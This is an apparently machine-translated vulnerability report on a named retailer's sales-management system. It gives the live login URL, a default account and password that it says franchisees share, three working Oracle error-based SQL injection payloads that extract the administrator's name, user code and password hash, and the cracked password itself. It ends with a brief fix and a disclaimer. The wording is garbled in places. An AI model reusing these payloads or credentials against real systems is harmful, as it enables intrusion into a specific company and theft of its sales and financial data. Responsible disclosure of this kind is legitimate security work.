City beauty SQL injection vulnerability causes store sales data leakage

City beauty SQL injection vulnerability causes store sales data leakage

Metropolis beauty SQL injection vulnerability: sales data of all stores leaked

MSS sales service system address: http://mss.cosmo-lady.com/mss/logonNewAction.do? Method = logon

Problems:

1. Weak Password

Account: 111111 password: 111111, And the password of most franchisees is also the default 111111.



2. SQL Injection

Submit login data address: http://mss.cosmo-lady.com/mss/logonNewAction.do? Method = logon

Data: loginWay = 0 & usercode = 'and length (PASSWORD) = 32 and 1 = ctxsys. drithsx. sn (1, (select username from sys_user where rownum = 1) and 'A' = 'a & passwd = 1

Directly blow the Administrator account


 

The User ID used to log on again

LoginWay = 0 & usercode = 'and length (PASSWORD) = 32 and 1 = ctxsys. drithsx. sn (1, (select usercode from sys_user where rownum = 1) and 'A' = 'a & passwd = 1


 

Password cracking

LoginWay = 0 & usercode = 'and length (PASSWORD) = 32 and 1 = ctxsys. drithsx. sn (1, (select password from sys_user where rownum = 1) and 'A' = 'a & passwd = 1


 

Decrypt and obtain the password dslrmss. log on to the system.


 

Store user
 

Financial flow
 

Various queries
 

For fear of entering the water meter, this is the end !!!

 

 

 

Solution:

Filter SQL Injection characters and modify weak passwords



Note: I have not modified, deleted, added, downloaded, or disseminated any data, but the security check stops successfully logging on to the system.